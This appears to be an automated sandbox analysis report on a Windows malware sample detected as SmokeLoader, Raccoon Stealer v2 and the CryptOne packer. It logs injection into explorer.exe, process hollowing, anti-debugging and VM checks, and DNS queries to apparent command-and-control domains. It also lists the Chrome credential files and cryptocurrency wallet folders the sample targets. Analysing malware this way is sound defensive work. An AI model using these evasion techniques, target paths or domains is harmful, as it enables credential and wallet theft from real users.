Source: explorer.exe, 00000004.00000000.257346804.00000000083E5000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: p\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: A658.exe, 0000001C.00000002.495884561.0000000000837000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\oy.F
Source: A658.exe, 0000001C.00000002.496916478.000000000088B000.00000004.00000020.00020000.00000000.sdmp, A658.exe, 0000001C.00000003.460901218.000000000088B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWMp
Source: explorer.exe, 00000004.00000000.256230443.00000000080ED000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000004.00000000.256626129.0000000008223000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00l
Source: C:\Users\user\Desktop\5tLwjRFzAW.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Code function: 20_2_004092CF LocalAlloc,LocalAlloc,LocalAlloc,lstrlen,lstrcpyn,lstrcpyn,lstrlen,lstrcpyn,lstrcpyn,lstrlen,lstrcpyn,lstrcpyn,GetSystemInfo,wsprintfW,LocalFree,LocalFree,LocalFree,LocalFree, 20_2_004092CF
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Code function: 20_2_004052DA LocalAlloc,StrCpyW,FindFirstFileW,FindFirstFileW,LocalFree,LocalAlloc,PathCombineW,LocalAlloc,PathCombineW,LocalAlloc,StrCpyW,LocalAlloc,lstrlenW,LocalAlloc,CopyFileW,CreateFileW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalFree,CloseHandle,DeleteFileW,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,LocalFree,FindClose, 20_2_004052DA
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Code function: 20_2_00405B5B LocalAlloc,StrCpyW,lstrlenW,FindFirstFileW,FindFirstFileW,LocalFree,LocalAlloc,PathCombineW,LocalFree,LocalAlloc,StrCpyW,LocalAlloc,StrCpyW,LocalAlloc,LocalAlloc,lstrlenW,StrRChrW,StrCpyW,lstrlenW,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,CopyFileW,CreateFileW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,GetFileSize,LocalFree,CloseHandle,DeleteFileW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindNextFileW,LocalFree,FindClose, 20_2_00405B5B
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Code function: 20_2_0040196E FindFirstFileW,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalFree,FindNextFileW,FindNextFileW,FindClose,StrStrW,StrStrW,LocalAlloc,PathCombineW,lstrlenW, 20_2_0040196E
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Code function: 20_2_0040B177 LocalAlloc,StrCpyW,FindFirstFileW,FindFirstFileW,LocalAlloc,PathCombineW,LocalFree,LocalAlloc,PathCombineW,LocalAlloc,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,StrCpyW,LocalAlloc,lstrlenW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CloseHandle,DeleteFileW,LocalAlloc,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW,FindNextFileW,LocalFree,FindClose, 20_2_0040B177
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Code function: 20_2_00401B05 FindFirstFileW,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,StrStrW,lstrlenW,lstrlenW,LocalAlloc,PathCombineW,LocalFree,lstrlenW,FindNextFileW,FindNextFileW,FindClose, 20_2_00401B05
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Code function: 20_2_0040AE06 LocalAlloc,LocalAlloc,SHGetSpecialFolderPathW,lstrcmpW,StrCpyW,StrCpyW,FindFirstFileW,FindFirstFileW,LocalFree,LocalFree,lstrcmpW,lstrcmpW,LocalAlloc,PathCombineW,lstrcmpW,LocalAlloc,PathCombineW,LocalAlloc,LocalAlloc,SHGetSpecialFolderPathW,lstrlenW,LocalAlloc,StrCpyW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalAlloc,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,StrCpyW,LocalFree,DeleteFileW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindNextFileW,LocalFree,LocalFree,FindClose, 20_2_0040AE06
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Code function: 20_2_00403C8F StrStrW,StrStrW,StrStrW,lstrlenW,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,LocalAlloc,lstrlenW,LocalAlloc,LocalAlloc,StrStrW,StrStrW,LocalAlloc,PathCombineW,LocalAlloc,FindFirstFileW,FindFirstFileW,StrStrW,LocalAlloc,StrCpyW,StrRChrW,StrRChrW,LocalAlloc,PathCombineW,LocalFree,LocalFree,FindNextFileW,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,StrStrW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree, 20_2_00403C8F
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Code function: 20_2_00401E18 LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,PathCombineW,StrCpyW,FindFirstFileW,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,LocalAlloc,StrCpyW,wsprintfW,PathCombineW,FindFirstFileW,FindFirstFileW,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree, 20_2_00401E18
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Code function: 20_2_0040633E FindFirstFileW,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalFree,FindNextFileW,FindNextFileW,FindClose,lstrlenW, 20_2_0040633E
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Code function: 20_2_004039D7 LocalAlloc,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalAlloc,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,StrCpyW,WideCharToMultiByte,LocalAlloc,LocalAlloc,WideCharToMultiByte,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW, 20_2_004039D7
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Code function: 20_2_00406725 LocalAlloc,StrCpyW,StrCpyW,FindFirstFileW,LocalAlloc,PathCombineW,lstrcmpW,LocalAlloc,LocalAlloc,LocalAlloc,StrCpyW,StrCpyW,StrCpyW,LocalAlloc,LocalAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree, 20_2_00406725
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Code function: 20_2_0043A390 FindFirstFileW, 20_2_0043A390
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Code function: 20_2_0043A448 FindFirstFileW, 20_2_0043A448
Source: C:\Users\user\Desktop\5tLwjRFzAW.exe System information queried: ModuleInformation Jump to behavior

Anti Debugging
barindex
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Source: C:\Users\user\Desktop\5tLwjRFzAW.exe System information queried: CodeIntegrityInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\irbiwat System information queried: CodeIntegrityInformation Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Code function: 20_2_00408ADD LocalAlloc,GetDesktopWindow,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LocalAlloc,GetClientRect,SetStretchBltMode,GetSystemMetrics,StretchBlt,GetSystemMetrics,StretchBlt,SelectObject,GetObjectW,LocalAlloc,CreateFileW,CreateFileW,LocalAlloc,LocalAlloc,StrCpyW,WideCharToMultiByte,WideCharToMultiByte,LocalFree,CloseHandle,DeleteFileW,LocalFree,LocalFree,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,DeleteObject,DeleteObject, 20_2_00408ADD
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Roaming\irbiwat Code function: 17_2_040E092B mov eax, dword ptr fs:[00000030h] 17_2_040E092B
Source: C:\Users\user\AppData\Roaming\irbiwat Code function: 17_2_040E0D90 mov eax, dword ptr fs:[00000030h] 17_2_040E0D90
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Code function: 20_2_0058092B mov eax, dword ptr fs:[00000030h] 20_2_0058092B
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Code function: 20_2_00580D90 mov eax, dword ptr fs:[00000030h] 20_2_00580D90
Source: C:\Users\user\AppData\Local\Temp\A658.exe Code function: 27_2_02340042 push dword ptr fs:[00000030h] 27_2_02340042
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\5tLwjRFzAW.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\irbiwat Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory protected: page write copy | page execute and write copy | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: cucumbetuturel4.com
Source: C:\Windows\explorer.exe Domain query: susuerulianita1.net
Source: C:\Windows\explorer.exe Domain query: linislominyt11.at
Source: C:\Windows\explorer.exe Domain query: moroitomo4.net
Source: C:\Windows\explorer.exe Domain query: monsutiur4.com
Source: C:\Windows\explorer.exe Domain query: nusurionuy5ff.at
Source: C:\Windows\explorer.exe Domain query: nunuslushau.com
Benign windows process drops PE files
Source: C:\Windows\explorer.exe File created: D0E3.dll.4.dr Jump to dropped file
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\5tLwjRFzAW.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\Desktop\5tLwjRFzAW.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Source: C:\Users\user\AppData\Roaming\irbiwat Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\AppData\Roaming\irbiwat Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Local\Temp\A658.exe Memory written: C:\Users\user\AppData\Local\Temp\A658.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A658.exe Memory written: C:\Users\user\AppData\Local\Temp\A658.exe base: 400000 value starts with: 4D5A Jump to behavior
Contains functionality to inject code into remote processes
Source: C:\Users\user\AppData\Local\Temp\A658.exe Code function: 27_2_02340110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess, 27_2_02340110
Creates a thread in another existing process (thread injection)
Source: C:\Users\user\Desktop\5tLwjRFzAW.exe Thread created: C:\Windows\explorer.exe EIP: 2651B44 Jump to behavior
Source: C:\Users\user\AppData\Roaming\irbiwat Thread created: unknown EIP: 4911B44 Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\user\AppData\Local\Temp\A658.exe Section unmapped: unknown base address: 400000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33.exe Section unmapped: unknown base address: 400000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\AppData\Local\Temp\A658.exe Process created: C:\Users\user\AppData\Local\Temp\A658.exe C:\Users\user\AppData\Local\Temp\A658.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A658.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33.exe Process created: unknown unknown Jump to behavior
Source: explorer.exe, 00000004.00000000.247967959.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.277893318.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.265408523.0000000000688000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ProgmanEXE^
Source: explorer.exe, 00000004.00000000.248208574.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.285756864.00000000080ED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.268554324.0000000005920000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000000.248208574.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.278343187.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.265751910.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000004.00000000.248208574.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.278343187.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.265751910.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000004.00000000.247981840.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.265429661.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.277925084.000000000069D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd4
Source: explorer.exe, 00000004.00000000.248208574.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.278343187.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.265751910.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: WProgram Manager
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Code function: LocalAlloc,LocalAlloc,LocalAlloc,GetLocaleInfoW,GetUserDefaultLCID,GetLocaleInfoW,wsprintfW,LocalFree,LocalFree, 20_2_00409064
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Code function: __crtGetLocaleInfoW_stat,_LocaleUpdate::~_LocaleUpdate, 20_2_00435820
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Code function: __crtGetLocaleInfoA_stat,_LocaleUpdate::~_LocaleUpdate, 20_2_00435890
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Code function: __nh_malloc_dbg,__malloc_dbg,__malloc_dbg,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_fix_grouping, 20_2_0042C940
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 20_2_0042BC30
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Code function: __nh_malloc_dbg,__malloc_dbg,__malloc_dbg,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_fix_grouping, 20_2_0042C570
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Code function: ___crtGetLocaleInfoW,___crtGetLocaleInfoW,__nh_malloc_dbg,___crtGetLocaleInfoW,__nh_malloc_dbg,_strncpy_s,__invoke_watson_if_error,___crtGetLocaleInfoW,_isdigit, 20_2_00428D00
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Code function: ___getlocaleinfo,__malloc_dbg,__nh_malloc_dbg,__nh_malloc_dbg,__nh_malloc_dbg,__nh_malloc_dbg,___crtLCMapStringW,___crtLCMapStringA,___crtLCMapStringA, 20_2_00416E50
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Code function: 20_2_004092CF cpuid 20_2_004092CF
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Code function: 20_2_0040919C LocalAlloc,GetTimeZoneInformation,LocalAlloc,wsprintfW,LocalFree, 20_2_0040919C
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Code function: 20_2_0040A672 LocalAlloc,GetUserNameW, 20_2_0040A672

Stealing of Sensitive Information
barindex
Yara detected CryptOne packer
Source: Yara match File source: 0000001F.00000002.502148462.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.596787162.00000000023C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Yara detected SmokeLoader
Source: Yara match File source: 00000000.00000002.295278143.0000000004271000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.278637701.0000000002651000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.294702276.0000000002690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.343191676.00000000040F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.343211043.0000000004111000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Yara detected Raccoon Stealer v2
Source: Yara match File source: 20.3.28E9.exe.4d2d13.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.28E9.exe.4d2d13.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.28E9.exe.4d2d13.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.28E9.exe.4d2d13.20.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.28E9.exe.4d2d13.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.28E9.exe.4d2d13.17.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.28E9.exe.4d2d13.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.28E9.exe.4d2d13.14.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.28E9.exe.4d2d13.20.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.28E9.exe.4d2d13.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.28E9.exe.4d2d13.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.28E9.exe.4d2d13.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.28E9.exe.4d2d13.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.28E9.exe.4d2d13.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.28E9.exe.4d2d13.17.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.28E9.exe.4d2d13.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.28E9.exe.4d2d13.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.28E9.exe.4d2d13.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000014.00000002.418605685.00000000004CC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.397574395.00000000004CC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.479074188.0000000000572000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.390943564.00000000004CF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.381054499.00000000004D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.389798020.00000000004CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.578384942.0000000000575000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.393288664.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.392382222.00000000004CF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.392760515.00000000004CF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.372026419.00000000004D3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.391797560.00000000004CF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: E69F.exe PID: 1436, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: E69F.exe, 00000023.00000003.479074188.0000000000572000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: wlts_electrum:Electrum;26;Electrum\wallets;*;-
Source: E69F.exe, 00000023.00000003.479074188.0000000000572000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: wlts_elecbch:ElectronCash;26;ElectronCash\wallets;*;-
Source: E69F.exe, 00000023.00000002.584376569.00000000005AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Electrum\wallets\*9
Source: 28E9.exe, 00000014.00000002.419440478.0000000000571000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\com.liberty.jaxx\*UD
Source: 28E9.exe, 00000014.00000002.419440478.0000000000571000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\exodus\*?C
Source: 28E9.exe, 00000014.00000002.419440478.0000000000571000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\exodus\*?C
Source: E69F.exe, 00000023.00000002.584376569.00000000005AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\*
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\28E9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\28E9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\28E9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\28E9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\AppData\Local\Temp\28E9.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\28E9.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior

Remote Access Functionality
barindex
Yara detected CryptOne packer
Source: Yara match File source: 0000001F.00000002.502148462.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.596787162.00000000023C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Yara detected SmokeLoader
Source: Yara match File source: 00000000.00000002.295278143.0000000004271000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.278637701.0000000002651000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.294702276.0000000002690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.343191676.00000000040F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.343211043.0000000004111000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Yara detected Raccoon Stealer v2
Source: Yara match File source: 20.3.28E9.exe.4d2d13.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.28E9.exe.4d2d13.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.28E9.exe.4d2d13.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.28E9.exe.4d2d13.20.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.28E9.exe.4d2d13.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.28E9.exe.4d2d13.17.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.28E9.exe.4d2d13.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.28E9.exe.4d2d13.14.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.28E9.exe.4d2d13.20.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.28E9.exe.4d2d13.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.28E9.exe.4d2d13.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.28E9.exe.4d2d13.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.28E9.exe.4d2d13.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.28E9.exe.4d2d13.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.28E9.exe.4d2d13.17.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.28E9.exe.4d2d13.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.28E9.exe.4d2d13.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.28E9.exe.4d2d13.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000014.00000002.418605685.00000000004CC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.397574395.00000000004CC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.479074188.0000000000572000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.390943564.00000000004CF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
